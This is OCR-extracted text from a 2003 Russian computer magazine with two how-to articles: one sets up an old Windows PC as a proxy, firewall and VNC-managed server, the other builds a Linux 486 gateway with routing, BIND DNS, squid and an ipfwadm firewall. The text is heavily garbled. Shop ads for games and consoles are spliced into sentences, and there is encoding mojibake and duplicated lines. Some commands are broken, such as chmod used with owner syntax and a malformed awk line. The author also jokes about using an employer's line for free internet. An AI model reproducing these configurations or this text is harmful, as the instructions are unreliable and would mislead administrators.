Добавил:

Anonymhacker Опубликованный материал нарушает ваши авторские права? Сообщите нам.

Вуз:

Пензенский Государственный Университет

Предмет:

[НЕСОРТИРОВАННОЕ]

Файл:

Специальный выпуск 33_Optimized

.pdf

Скачиваний:

Добавлен:

20.04.2024

Размер:

11.69 Mб

Скачать

☆

<<< < Предыдущая 1 2 3 45 / 125 6 7 8 9 10 11 12 > Следующая >>>

hang

NOW!

BUY

gзащищенностью. А если винт маленький, как у моего

МАГАЗИНp g

w Click

артефакта, то просто необходимо разбить его похит-

-xcha

-x cha

рей, чтобы сохранить так необходимые метры. Вообще,

БЫСТРО

УДОБНО

ДОСТУПНО

NTFS позволяет выбирать размер кластера от 512 байт

до 4096 байт (и это не предел), что позволяет более

экономно использовать пространство на винте. Так, ес-

ли у тебя на серваке куча файлов, имеющих длину 1-2

байта (а они неизбежно появятся в ходе работы), то

при размере кластера 4096 байт ты потеряешь 4 кило-

байта на каждом таком файле. Это немного, но если

файлов тысячи и далеко не у каждого файла размер

PAL $275.99

кратен 4096 байтам (что является оптимальным сай-

зом, так все кластеры занимаются полностью), то поте-

NTSC $289.99

ри могут доходить до сотни-другой мегов. А если на

винте лежит здоровый фильм, занимающий дофига

кластеров, то при его просмотре или копировании ско-

рость работы всего компа падает, ведь ОС нужно про-

читать каждый кластер и найти следующий, причем

выполнить это очень быстро. Вот почему на серверах

начали создавать, как минимум, три раздела: первый -

системный, на него ставим серверную ОС; второй - с

максимальным размером кластера, поддерживаемым

данной файловой системой, на нем будут храниться

фильмы, музыка и здоровенные софтины; и третий - с

минимальным размером кластера, туда будут сейвить-

ся временные файлы, все хтмлки, скрипты, почта юзе-

ров и прочие мелочи. После такого хитрой разбивки я

был уверен, что выжал из винчестера максимальную

емкость, и двинулся дальше.

СТАВИМ И ОПТИМИЗИМИЗУЕМ

Установка самой ОС не вызвала особых проблем, все

стало в пределах нормы без глюков. Необходимые дро-

ва для железа нашлись в инете. Дело встало лишь за

Технические параметры: $83.99*/85.99

$83.99*/83.99

оптимизацией ОСи.

Для повышения скорости соображалки твоего сервака

Процессор: Intel Pentium-3 733 Mhz

хорошо бы увеличить зарезервированную кэш-память.

Графический процессор:

Это можно сделать, изменив в реестре значение ключа

nVidia XGPU 233 Mhz

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\

Производительность: 125 Млн пол./сек

Control\SessionManager\Memory-Management\

Память: 64 Mb 200 Mhz DDR

LargeSystemCache òèïà REG_DWORD ñ 0 íà 1. Íî íàäî

Çâóê: nVidia MCPX 200 Mhz,

256 каналов, Dolby Digital 5.1

Прочее: 2-5х DVD-drive, жесткий диск 8 Gb,

Return to Castle

4xUSB-порта, сетевая плата 100 MBps

Star Wars:

Knights of the

Wolfenstein:

Воспроизведение DVD-фильмов

Old Republic

Tides of War

$83.99*/79.99

$79.99*/85.99

$79.99*

$83.99*/85.99

Enter the Matrix

Tao Feng:

APEX

Brute Force

Вот так можно рулить удаленным сервантом с мопеда

Fist of the Lotus

$83,99*

$79.95*/72.99

Заказы по интернету –

круглосуточно!

e-mail: sales@e-shop.ru

Заказы по телефону

можно сделать

ñ 10.00 äî 21.00 ïí – ïò

ñ 10.00 äî 19.00 ñá – âñ

Pirates of the

Dead or Alive

СУПЕРПРЕДЛОЖЕНИЕ ДЛЯ

Caribbean

Xtreme Beach

ИНОГОРОДНИХ ПОКУПАТЕЛЕЙ:

Volleyball

стоимость доставки

снижена на 10%!

* - цена на американскую версию игры (NTSC)

(095) 928-6089 (095) 928-0360 (095) 928-3574

#8(33)

Запустим ручки в реестр... по локоть

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P									o
P					HOWTO/NOW! СТАРАЯ СКРИПУЧАЯ ФОРТОЧКА
					HOWTO/NOW! СТАРАЯ СКРИПУЧАЯ ФОРТОЧКА
w Click				to	BUY					m
w Click										m
w
	w								o		учесть, что если у тебя маловато
	.							e			учесть, что если у тебя маловато
		p	df				g		.c
			df			n
				-xcha							оперативы, то такой финт может
											оперативы, то такой финт может
											ухудшить работу с сетью - увеличит-
											ся нагрузка на своп, который обла-
											дает очень малой производитель-
											ностью по сравнению с оператив-
											кой. Еще я предлагаю оптимизиро-
											вать файловую систему, чтобы хоть
											еще на грамм поднять скорость ра-
			4work								боты сервера. Для этого мы прове-
											дем парочку несложных действий:
											во-первых, изменим параметр
											“IoPageLockLimit” в ключе
			ÎÑè								[HKEY_LOCAL_MACHINE\SYSTEM\
			ÎÑè								CurrentControlSet\Control\Session
											Manager\Memory Management]. Çíà-
											чения IoPageLockLimit при объеме
											оперативы в метрах такие: 32 mb -
											4096000; 64 mb - 8192000; 128 mb -
											16384000; 256+ mb - 65536000. Ýòî
											позволит тебе несколько ускорить
											работу с винтом за счет выделения
											большего количества памяти на кэ-
											ширование. А во-вторых, уберем
					Многие юзеры						возможность NTFS создавать имена
					Многие юзеры						возможность NTFS создавать имена
					качают из						файлов, совместимые со стандартом
					инета одно и						файлов, совместимые со стандартом
					инета одно и						ДОС. Для этого найдем в реестре та-
					òî æå ïî íåñ-						ДОС. Для этого найдем в реестре та-
					колько раз,						êîé êëþ÷:
					òàê ÷òî êýøè-						[HKEY_LOCAL_MACHINE\SYSTEM\
					рующий прок-						[HKEY_LOCAL_MACHINE\SYSTEM\
					места на винте						CurrentControlSet\Control\FileSyste
					си и немного
					помогут серь-						m] и изменим параметр
					езно эконо-						NtfsDisable8dot3NameCreation íà 0.
					мить деньги.						Сейчас перезагрузка и создание до-
											Сейчас перезагрузка и создание до-
											полнительных имен формата 8.3
											отключены. Но есть одно “но”: мно-
											гие программы для ДОС, работаю-
											щие с диском, могут вылетать с
											ошибкой файловой системы. Если
											ты столкнулся с этой траблой, то ли-
											бо включи обратно параметр (изме-
											ни значение на 1), либо помести
											софтину в каталог, имя которого не
											превышает 8 символов в длину и
											содержит не более 255 вложений.
											И наконец, последний финт с реест-
											ром: в ключе [HKEY_LOCAL_MACHINE\
											SYSTEM\CurrentControlSet\Control\
											FileSystem] создаем параметр с име-
											íåì “NtfsDisableLastAccessUpdate”,
											тип REG_DWORD и делаем его рав-
											ным единице. Сейчас ты отключил
											редко используемую возможность
											NTFS по изменению времени послед-
											него доступа к каталогу. Если у тебя
					На серверах						много вложенных папок, то ты заме-
					На серверах						много вложенных папок, то ты заме-
					создают, как						тишь ускорение невооруженным гла-
					минимум, три						тишь ускорение невооруженным гла-
					минимум, три						зом. После несложной оптимизации
					раздела: пер-						зом. После несложной оптимизации
					вый - систем-						мы можем смело переходить к наст-
					ный, второй -						мы можем смело переходить к наст-
					ный, второй -						ройке непосредственно самого сер-
					с максималь-						ройке непосредственно самого сер-
					ным размером						вака: прокси, фаерволла и т.д.
					кластера для
					хранения						ПОДОИМ СЕРВЕР
					фильмов и му-						ПОДОИМ СЕРВЕР
					зыки, и третий						Для начала поднимем часть, отвеча-
					- с минималь-						Для начала поднимем часть, отвеча-
					- с минималь-						ющую за дозвон ;), чтобы организо-
					ным размером						ющую за дозвон ;), чтобы организо-
					кластера для						вать на этом компе сервер удаленно-
					временных						вать на этом компе сервер удаленно-
					временных						го доступа и попользоваться благами
					файлов, почты						го доступа и попользоваться благами
					юзеров и про-						халявного инета в нерабочее время.
					чей мелочи.						Все тут достаточно просто: ставим мо-
											Все тут достаточно просто: ставим мо-
											дем, устанавливаем на него дрова.
											Дальше запускаем мастера новых
											подключений (if you in broney train),
											кликаем правой кнопкой по сетевому
											окружению (My Network Places), вы-
											бираем свойства (Properties), а даль-

hang

NOW!

BUY

w Click

сейчас оф-лайн, прога предложит .

“заказать” нужные паги, и они бу-

-x cha

дут загружены автоматически в

следующий раз). Удобно? Мне то-

же понравилось, особенно если

учесть, что к вечеру я забываю,

что хотел скачать ночью... И самый

главный плюс - возможность прос-

мотра в оф-лайне всех страниц, по-

сещенных во время серфа, причем

Грамотный прокси с приятным фейсом

эти странички сейвятся очень куль-

ше создаем новое подключение

турно: в папке с прогой создается

каталог cache и в нем создаются

(Create a new connection), а там юзаем

подкаталоги - типа www.porno.ru.

пункт set up advance connection. Чтоб

К несчастью, минусы тоже есть: от-

не было наездов и ора скажу сразу,

сутствует хелп, при использовании

что у меня Винда английская и я не

этой софтины на одиночном компью-

променяю ее ни на какую русифика-

тере, подключенном к инету через мо-

цию, поэтому иногда буду говорить

дем, падает скорость работы соедине-

чиста англицкие пункты. Теперь твоя

ния. Причина проста: сначала проис-

система сможет принимать входящие

ходит скачивание в кэш, а потом

звонки, то есть будет брать трубку,

только эти данные приходят к браузе-

когда модем зафиксирует сигнал, и

ру. Еще эта прога - шароварная, это

проверять имя юзера/пасс, но она не

формальность, конечно, но тем не ме-

сможет нормально пустить его в инет.

нее. А еще был замечен такой весе-

Если юзер, подцепленный к виндово-

лый глюк: этот прокси определяет,

му серваку по модему, попробует

подключен ли ты к сети, просто пин-

вбить адрес страницы, то он, по идее,

гуя указанный сервак (по умолчанию

сможет ее загрузить, но есть огром-

- любимый microsoft.com), но я, решив

ное НО! IP, присвоенный юзеру Вин-

провести массовую оптимизацию,

дой при соединении, вылезет в сеть,

указал сайт нашей локалки, и только

и если в сети уже есть такой IP, прои-

он вырубился (гроза была...), прога

зойдет очень нехорошая вещь: оба

начала выдавать все страницы иск-

компа-конкурента начнут жутко тор-

лючительно из кэша. И только слу-

мозить, а потом и вовсе могу упасть в

чайно это заметили - курс доллара на

даун. Но даже если IP свободен, про-

Яндексе оказался староватым. То

вайдерские админы тебе кинут огром-

есть моя интрасеть некоторое время

ное предупреждение - левые IP в ло-

работала вообще без связи с внеш-

калке очень мешают при работе сер-

ним миром, только благодаря закро-

ваков, да и организовывать нужно

мам этой программульки. А это гово-

юзеров, а то за неделю расползутся

рит о том, что очень многие юзеры ка-

по всему диапазону от 0.0.0.0 до

чают из инета одно и то же по нес-

255.255.255.255. Вот поэтому необхо-

колько раз. Так что ставьте, начинаю-

димо разграничить сеть с дозвоном и

щие админы, кэширующий прокси,

не выпускать левых IP в локалку.

выделяйте побольше места на винте

и рулите своей сетью, экономя деньги

НЕКИСЛЫЙ ПРОКСИК

на новый девайсик.

Обеспечить такое разграничение призван прокси-сервер. В инете развелось огромное количество их модификаций, с разными возможностями и разной ценой. Но тебе нужно учесть, что наша машинка не самая мощная, и поэтому необходимо выбирать софтину, которая выполняет роль именно прокси, а не всякого фильтра и защитника сети. Только так мы сможем сохранить приемлемую скорость работы сервака. Мой выбор пал на очень неплохую программку: CoolProxy (http://www.coolproxy.narod.ru). В моем распоряжении оказалась версия 1.4. Это полноценный проксисервер с развитой поддержкой кэширования. Вот его плюсы: простая установка и настройка, очень грамотное кэширование графики, то есть самой трафожрущей части, достаточно простой и понятный русский фейс, возможность заказа веб-страниц (ты смотришь главную страницу сайта, находишь нужные ссылки, кликаешь по ним, и если ты

КОЛЮЧИЙ ЗАБОРЧИК

Дальше, раз уже мы решили делать все грамотно, нам следует поставить фаерволл для защиты от внешних атак и от атак доморощенных “хакеров” на инет (а то придут к тебе раздолбаи из органов). Для этого я, руководствуясь кое-каким опытом и советами знакомых админов, выбрал софтину с именем Argnitum Outpost Firewall Pro (www.agnitum.com/download/). Опишу лишь самые важные ее плюсы: малый размер дистрибутива, несколько режимов работы (бездействие, обучение, разрешение того, что не запрещено, и запрещение того, что не разрешено), русский фейс, наличие готовых правил для многих софтин (например, опера, бат, експлорер, аутглук были уже настроены), возможность апгрейда с помощью плагинов. Так, уже по дефолту, ставятся очень полезные вещи: кэширование DNS, которое резко уменьшает время поиска IP-адреса, блокиратор рекламы, позволяющий


page	040	08(33) 2003

hang

NOW!

w Click

BUY

МАГАЗИНw Click

BUY

x h

вырезать надоедливые баннеры по размеру и по ссыл-

С ДОСТАВКОЙ НА ДОМx h

c an

кам, детектор атак и кое-какие еще. Еще мне понравилось

c an

БЫСТРО

УДОБНО

ДОСТУПНО

то, что при модификации запускного файла, который

раньше имел разрешение на связь с инетом, она очень

громко кричит об этом.

ПУЛЬТ К ТЕЛЕКУ

И последним очень важным пунктом будет управление

сервером. Ведь нет смысла серверному компу иметь

постоянную видеокарту и монитор. Вот поэтому я пред-

лагаю использовать софтину для удаленного админи-

стрирования. Мне больше всего нравится простая в ис-

пользовании программулька WinVNC

(http://www.realvnc.com). На момент написания статьи

последняя версия 3.3.7, вес проги - 564 кб. Вся програ-

ммка состоит из двух частей: первая вешается на уп-

равляемый компьютер и слушает определенный порт, а

вторая устанавливается на комп, с которого ты хочешь

$149.99

рулить сервак. Дальнейшая работа с такой программой

не вызовет проблем - перед тобой обычный рабочий

стол мастдая (или линухи, но это не сюда), на котором

можно производить манипуляции хвостатым создани-

ем. Также советую эту прогу установить всем знакомым

ламерам, которым ты помогаешь при настройке компа, -

так ты сможешь, не отрываясь от своего ящика, настро-

ить комп челу хоть из Африки. Скорость работы впол-

не приемлемая: я с модема могу конфигурить сервак,

чем сейчас по совместительству и занимаюсь ;).

СЕРВЕР ЖИЛ,

Технические параметры:

Процессор: 32-Bit ARM

ЖИВ И БУДЕТ ЖИТЬ

Память: 32-96 KB VRAM (в CPU), 256 KB

А теперь некоторые итоги на примере моего сервера.

Экран: 2.9’’ TFT c отражающей матрицей (40.8

Сейчас он благополучно работает в качестве шлюза в

ìì õ 61.2 ìì)

инет, сервера удаленного доступа, фаерволла и кэши-

Разрешение и цвет: 240х160 пикселей,

рующего прокси. Установка такого компьютера на гра-

32.768 возможных цветов

нице интрасети и инета позволит сэкономить денежки

Размеры (ШхВхТ): 144.5 х 82 х 24.5 мм

Âåñ: 140 ã

и нервы юзеров. Также существенно облегчится учет

Питание: 2 батареи класса АА (15 часов)

трафика, просиженного пользователями. При всех по-

Носители данных: картриджи

$95.99

ложительных чертах были замечены кое-какие мину-

Другое: Стереозвук, совместим с играми для

сы: понизилась скорость работы в сети, больше рабо-

Game Boy è Game Boy Color

ты стало у местного админа по причине потенциальной

Технические спецификации только для GBA SP:

нестабильности Винды. Для полноценной работы сер-

* Интегрированная подсветка LCD экрана* Входящая в комплект перезаряжаемая Lithium

вера необходимо больше оперативной памяти, недос-

Ion батарея, способная работать 10 часов безостановочной игры, заряжаемая всего 3 часа

таток которой очень четко проявляется в разгар рабо-

$59.99

$52.99

$59.99

чего дня (сеть начинает тормозить, выскакивают сооб-

щения об ошибках при коннекте к прокси-серверу, и

сам сервак резко увеличивает время ответа на пинг).

Если бы юзеров в сети было поменьше (не больше 10

компов), то все было бы тип-топ, а вот при таком раск-

ладе лучше всего поставить консольный линух и на

нем настроить все вышеописанные сервисы. Хотя если

скорость не столь критична, да и в пингвиньей консо-

Golden Sun: The

The Legend Of Zelda:

Castlevania: Aria

ли ты слабоват, ставь Винды - они вполне могут вы-

Lost Age

A Link to the Past

of Sorrow

полнять функции простого в настройке сервера.

$59.99

Advance Wars 2:

Donkey Kong

Tom Clancy's

Black Hole Rising

Country

Splinter Cell

Заказы по интернету – круглосуточно! e-mail: sales@e-shop.ru

Заказы по телефону можно сделать

с 10.00 до 21.00 с понедельника по пятницу с 10.00 до 19.00 с субботы по воскресенье

СУПЕР-ПРЕДЛОЖЕНИЕ ДЛЯ ИНОГОРОДНИХ ПОКУПАТЕЛЕЙ:

стоимость доставки

снижена на 10%!

(095) 928-6089 (095) 928-0360 (095) 928-3574

#8(33)

Вот так можно настроить халявный инет дома

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D									r
P						NOW!				o
P

					HOWTO/В БОЙ ИДУТ ОДНИ СТАРИКИ
w Click				to	BUY
w Click											m
w								Â ÁÎÉ ÈÄÓÒ ÎÄÍÈ
	w									o
	.								.c
		p					g
			df			n		e
				-xcha
								СТАРИКИ

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ÎÑè 4work

ПРЕВРАЩАЕМ ЧЕТВЕРКУ В СЕРВАК НА ЛИНУХЕ

Vint (vint@townnet.ru)	Здорово, я снова в эфире! Сегодняшняя статья наверняка будет интересна и актуальна.
	Ведь ты, стопудняк, уже устроился на работу к прову крупной локальной сетки, и у
	тебя наверняка на стенке висит старая раскуроченная четверка или даже пень.

Если у тебя что-то не получилось с ipfwadm, то поищи софтину для конфига фаерволла ipchains, заменяющую ipfwadm, который использовался в старом коде IP Firewall.

Ñейчас мы найдем этому всему применение.

СУТЬ ТРАБЛЫ

Ты наверняка слышал о таких крутых вещах, как аппаратные фаерволлы, гейты (или мосты), и всегда думал, что замутить подобную хрень трудно. Ведь надо иметь новейшее железо, крутейший софт и прямейшие руки. Но, оказывается, все просто, как пупок. Я развею миф о сложности и навороченности сих плюшек простым и элегантным способом: опишу, как настроить шлюз, прокси, фаерволл и почтовый сервак на простенькой машинке: i486 с 16 мегами крутейших SIMM оперативы на борту и еще до кучи сетевуха да мопед - все исключительно isa’шки.

Как ты сам уже понял, железо нашего сервака находится на грани фантастики... 80-х годов. На кой фиг тебе это все, если можно купить крутейший сервак за кучу баксов? А зачем, если наша четверка, грамотно настроенная и оточенная, будет идти наравне с тачкой на Бартоне? Причина этого проста: для наших целей вовсе необязательна огромная производительность - проксить и фаерволить может и комп-пенсионер. Не, бабло с шефа, конечно, сруби и Бартика тащи домой, а на его место отдирай артефактную мать от стены.

Далее определимся с софтом. Для своих извратных целей я избрал дистрибутив ALT Linux Master 2.2.

ХАРД НАДО СТАВИТЬ, НА ТО ОН И ХАРД!

Все делается просто, как раз-два. Становись рутом: su, пароль root’a. Дальше DrakConf - это общий конфигуратор - в нем глянь, есть ли твоя сетевуха в списке (настройка оборудования -> автоопределение устройств). Если она найдена, идем дальше, иначе инет и его факи ждут тебя. У меня все встало идеально.

Затем мы приступаем непосредственно к установке сети, набрав команду netconf или просто в окне

Network configurator кликаем по Basic host information и в открывшемся диалоге пишем сетевое имя компа, затем на вкладке Adaptor 1 включаем (Enabled) сетевуху. После чего вводим инфу о сети и о плате (IP-адрес, сетевая маска, IO Port, Irq). В поле NetDevice укажи тип сетевого устройства - сейчас это eth0 (от Ethernet), а в поле Kernel Module - имя модуля ядра, которое соответствует твоей сетевухе. И еще одна маленькая плюшка: если у тебя сетевуха PCI , то IO Port и IRQ устанавливать не нужно. Все, твоя сетевуха настроена и готова к работе.

Если у тебя будет две сетевые карты, воткни вторую и повтори все снова, а если модем, то просто вклю- чи его - внешние могут работать без особых драйверов и настроек.

А дальше следует заняться собственно настройкой нашей великой машины. Установим-ка мы шлюз!

КРУТЕЕМ И СТАВИМ ШЛЮЗ

Вообще твой комп легко может связать две сети в одну без помощи хаба, но для этого тебе нужно будет две сетевухи (или больше, смотря сколько сетей ты сливаешь) и чуток терпения дочитать эту статью. Также шлюз стоит организовывать, когда у тебя дома/на работе/в универе есть локалка и только одна дырка в Инет. Чтобы все могли его юзать, ты и ставишь шлюз, после чего тебя все носят на руках.

Вот тебе практический пример объединения двух сетей. Дано: IBM 486 с 16 мегами мозгов, две сетевые платы, бухта витухи и два дня сроку. Решение: ставим консольную линуху, настраиваем сетевухи на eth0 и eth1 и даем IP-адреса:

ifconfig eth0 192.168.1.1 up (подняли первую карточку) ifconfig eth1 192.168.2.1 up (подняли вторую карточку)

Дальше необходимо настроить маршрутизацию между подсетями 192.168.1.0 и 192.168.2.0, что позволит юзерам из одной подсети видеть расшаренные ресурсы в другом сегменте. Говорим, что компы, которые находятся в нашем локальном сегменте 192.168.1.*, сидят на первом интерфейсе и обращаться к ним следует напрямую:

route add net 192.168.1.0 192.168.1.1 netmask 255.255.255.0 0

А вот с машинами из соседней сетки, имеющими адреса 192.168.2.*, будем разговаривать через eth1:

route add net 192.168.2.0 192.168.2.1 netmask 255. 255. 255.0 0

Последний параметр - это метрика. Ее можно понимать как “расстояние до шлюза-назначения” или “сколько прыжков между шлюзами

Заставка великого и могучего никсового текстового редактора vim. А ты помог детям?


page	042	08(33) 2003

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.								.c
		p					g
			df			n		e
				-xcha

					hang		e
				C			e	E
			X					E
		-							d
		F								t
		D								i
		D								r
	P						NOW!			o
	P
HOWTO/В БОЙ ИДУТ ОДНИ СТАРИКИ
	w Click				to	BUY					m
	w Click										m
	w									o
		w								o
		.							.c
			p					g
				df			n		e
					-x cha

придется сделать пакету по пути и обратно”. Так как адреса 192.168.1.1 и 192.168.2.1 являются адресами этой тачки в разных сетях, то метрика равна 0.

Пакеты для IP-адресов, которые не находятся в нашей локальной сети, будем отправлять на машину 192.168.1.11, а она сама будет разбираться, что с ними делать:

route add default 192.168.1.11 1

Обрати внимание, что значение метрики равно 1.

DNS, ЧТОБ НЕ МУЧАТЬСЯ

Дальше разберем проблему с IPадресами и с соответствующими им именами компов - ведь символьный адрес гораздо проще запомнить, чем четырехбайтное число. Так что построим у себя в локалке DNS систему. На всякий случай напомню, что вся работа сервера доменных имен (Domain Name System) сводится к преобразованию мнемони- ческих имен машин в IP-адреса и обратно. То есть для того, чтобы узнать, какой IP у компа VasiaPipkin, необходимо спросить DNS сервер, и только после полу- чения ответа мы можем начинать работу. Учитывая, что на обращение к серверу DNS провайдера требуется 10-15, а иногда и все 30 секунд (это зависит от загрузки сети и от скорости соединения), установка сервера DNS в локальной сети с выходом в инет является просто необходимой. Обычно сервер DNS ставится на шлюзе, который используется для выхода в интернет. Перед началом настройки серванта следует определить, запущен ли он:

ps -ax | grep named

Если запущен - тормози его командой kill или ndc, а если он вообще не установлен, то ставь пакет bind. Учти, что исполнимый файл называется named, а сам пакет - bind. Все, дальше идет чистая настройка.

В файле /etc/named.conf лежит основная информация о парамет-

рах сервера (редактируй из-под рута). Вот пример:

logging {category cname {null;};}; - этот параметр показывает отсутствие канонического имени options {directory “/var/named”;}; - расположение файлов имен

zone “.” {type hint;file “named.ca”;}; - Файл named.ca - корневой кэш, он содержит информацию о корневых серверах DNS

zone “shadrinsk.net” {type master;file “shadrinsk.net”;notify no;}; - это зона, обслуживаемая нашим серваком

zone “0.0.127.in-addr.arpa” {type master;file “named.local”;}; - локальная зона

zone “1.168.192.in-addr.arpa” {type master;file “192.168.1”;notify yes;}; - привязка к IP нашего серванта

Следующий файл - shadrinsk.net. Его основное назначение - выполнять преобразования символьных имен в IP. Вот что внутри:

@ IN SOA den.shadrinsk.net. hostmaster.shadrinsk.net. ( 75031225; - серийный номер

7200; - обновление каждые 2 часа (указано количество секунд) 3600; - повтор каждый час

360000; - хранить информацию 100 часов

86400); TTL (время жизни) записи - 24 часа

IN NS den.shadrinsk.net IN A 192.168.1.1

IN MX 150 den.shadrinsk.net

Файл 192.168.1 - файл обратного соответствия. Он хранит настройки перевода IP в имя. Внутренности такие:

@IN SOA den.shadrinsk.net. hostmaster.shadrinsk.net (

75031225; - серийный номер 7200; - обновление каждые 2 часа 3600; - повтор каждый час

360000; - хранить информацию 100 часов

86400); - TTL записи - 24 часа

@IN NS den.shadrinsk.net

1 IN PTR den.shadrinsk.net;

Запись PTR необходима при преобразовании IP в имя.

2.1.168.192 IN PTR evh.shadrinsk.net;

Если указан не весь IP, то к нему будет добавлен адрес подсети

4work ÎÑè

Есть набор полезных скриптов для настройки фаерволла, доступный на ftpсервере ipchains: ftp://ftp. rustcorp.com/ ipchains/ ipchains-scripts- 1.1.2.tar.gz.

Миджинт командер - первый помощник любого админа


08(33) 2003	page	043

hang

HOWTO/NOW! В БОЙ ИДУТ ОДНИ СТАРИКИ

w Click

BUY

make; - сборка бинарика из сорцов;

-xcha

make install; - прога устанавливает

себя, как хочет (все из-под рута).

ÎÑè 4work

Официальная

страница

пингвиньего

фаерволла живет по адресу: http://www. rustcorp.com/ linux/ipchains.

Мой пингвинчик приветствует админа

1.168.192, причем байты в IP следует указывать в обратном порядке.

Дальше необходимо установить файл кэша (в нем хранятся основные хосты и соответствующие им IP в Инете). Для этого придется подрубиться к Инету и запустить ДНС сервер у себя на машине. Затем вбивай вот такую комбинацию: nslookup | tee ns (что значит найти более новый файл кэша серваков и их IP). После этого делай: set q=ns (или set type=ns) - это покажет тебе список корневых серверов DNS, который будет помещен в файл ns. А дальше последний шаг: преобразование сграбленного файла ns в понятный серваку вид, для этого, не мудрствуя лукаво, введи:

#./bin/awk awk ‘ BEGIN { /root/ { print “. IN NS “ $4”.” } /internet/ { print $1”.” “ 999999 IN A “ $5 } END ‘ И поюзай софтину reformat вот так: reformat ns named.ca. Теперь осталось скопировать named.ca в каталог /var/named. Дальше все должно заработать.

Свежие сорцы ядра ты всегда можешь слить с одноименного сайта http://www. kernel.org.

ЭКОНОМИМ КОПЕЙКУ

Раз уж мы решили устроить большой трах для нашей четверки, превратим несчастный айбиэм компатабл компутер в настоящий прок- си-сервер с установленным на нем фаерволлом.

Для начала чуток инфы. Проксисервер необходимо ставить, если у тебя есть локальная сеть, сервак и только один канал связи (или один реальный IP). В других случаях ставить прокси особого смысла нет. Если же твой домашний комп вообще не подключен к сети, то проксик только затормозит твою работу в Инете и не принесет никакой ощутимой выгоды. Но если у тебя есть “настоящая” локалка минимум из трех компов, то смело читай дальше - установив кэширующую проксю, ты не только увеличишь скорость доступа к Инету, но и сэкономишь траф за счет кэша.

Клаву и мозги к бою: начинаем ставить squid (http://www.squidcache.org). С самим процессом установки возникнуть проблем не должно:

./configure; - дистр конфижится под твое ядро;

Бинарик ставят так:

rpm -i имя_файла.rpm

А вот более сложный процесс конфигурирования сквида я опишу. Естественно, все настройки будем проводить редактируя конфигурационные файлы всенародным vi. Место нахождения этих файлов сильно отличается, в зависимости от дистрибутива (могут быть в /etc, в /usr/local/etc/squid, в /usr/local/ squid/etc). Так что их придется поискать. Заюзаем команду поиска главного файла squid.conf:

find / -name “squid. conf” -print

Поиск веди от рута. А дальше грузи его в vi да не пугайся, что там 3000 строк, - настроек гораздо меньше. Вот самые необходимые:

#IP-адрес и порт, на котором будет доступен прокси-сервер для клиентов:

http_port 192.168.0.2:3128

#Уберем “общение” с соседними прокси-серверами:

icp_port 0 htcp_port 0

#Отключим кэширование динами- чески загружаемых страниц:

acl QUERY urlpath_regex cgi-bin \? no_cache deny QUERY

#Укажем местонахождение и размер кэша (200Мб):

cache_dir ufs /var/squid 200 32 384

#Местонахождение логов запросов к прокси-серверу: cache_access_log /usr/local/squid/logs/access.log

#Местонахождение логов кэша: cache_log /usr/local/squid/logs/cache.log

Вот так следует конфигурировать сервак

hang

NOW!

BUY

w Click

# Отключим лог менеджера кэша .

(большинство уверяет, что он не

-x cha

нужен): cache_store_log none

# Пароль для анонимного ftp-сое- динения:

ftp_user ano@shadrinsk.net

# Откроем доступ к прокси-серверу с клиентов из нашей подсети:

acl all src 192.168.0.0/16 http_access allow all

Но это еще не все :), проблема в том, что демон сквида по умолча- нию запускается с правами nobody из группы nogroup (это один из самых бесправных юзеров в Линухе). Нам следует это учесть и разрешить доступ к файлам прокси такому юзеру. Делаем это так:

chmod nobody:nogroup /usr/local/squid/logs mkdir /var/squid

chmod nobody:nogroup /var/squid

Дальше последует первый (об этом говорит параметр z) запуск:

/usr/local/squid/bin/squid -z

Если все прошло успешно, можешь скакать от радости - твоя четверка превратилась в могучий прокси-сервант, основанный на устойчивой ОС Линукс.

ЗАЩИЩАЕМ ФАЗЕНДУ

Прокси - вещь хорошая, это тебе и анонимность, и распределение трафа, и экономия. Но это не все, на что способна наша четверочка: сей- час мы настроим на базе сей машинки межсетевой экран aka фаерволл. Пингвиний фаерволл использует принцип фильтрации пакетов, то есть он просматривает заголовки пакетов по мере их прихода и решает дальнейшую судьбу всего пакета. Защитник может прибить пакет, принять пакет или сделать с ним что-то еще более сложное, типа маскарадинга или хитрого редиректа ;). То, что Линух - правильная ОС, доказы-


page	044	08(33) 2003

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D									r
P						NOW!				o
P
					BUY
				to	BUY
w Click				to							m
w Click											m
w
	w									o
	.							вается уже тем, что защита сетей
	.							.c
		p					g
			df			n		e
				-xcha

заложена в ее ядре. Чтобы заюзать эту мазу, тебе нужно скомпилировать ядро, указав одобрение в пунктах IP forwarding/gatewaying (CONFIG_IP_FORWARD) и IP firewalling (CONFIG_IP_FIREWALL). Если вклю- чить эти пункты и задать определенные правила, Линь будет шерстить вообще все пакеты, проходящие с одного интерфейса на другой (если тебе так проще, то с одной машины на другую). Этого вполне достаточ- но, чтобы защитить всю локалку с помощью одного компа - гейта в Инет, что нам идеально подходит.

Чтобы включить и настроить защиту, юзь софтину по имени ipfwadm. При настройке учитывай следующие вещи: если у тебя в сети нет особенных наворотов, то ча- ще всего достаточно закрыть TCPпорты с 1 по 1024, чтобы отрубить доступ к основным TCP-серверам и порты с 5000 по 65535 для запрета доступа к X-серверам. Порты 1025-4999 можно оставить открытыми. Но если у тебя в сети крутится веб, фтп или другой подобный сервак, то следует к указанным выше добавить используемые ими порты (например, для web - 80-й). Более подробно смотри в /etc/service. Все команды настройки защиты следует записать в отдельный командный файл (например, /etc/rc.d/rc.firewall) и вызывать его при выходе системы в мультирежим из файла /etc/rc.d.rc.inet1. Вот маленький отрывок такого файла с необходимыми ремарками:

#./bin/sh NET=195.161.26.87 #Инет LOCALNET=198.168.0.0 #локальная сеть и ее IP

/sbin/ipfwadm -B -f #сброс блокировок #Пропускать всех внутрь локалки (вход - рубль, выход - пять ;))

/sbin/ipfwadm -B -a accept -S ${LOCALNET}/24 -D ${LOCALNET}/24 #Тормозим пакетики на TCP-серверы локалки

/sbin/ipfwadm -B -P tcp -a deny -S 255.255.255.255/0 -D ${LOCALNET}/24 0:1024 #номера портов #Еще не пустим пакеты, направленные на Х-сервера

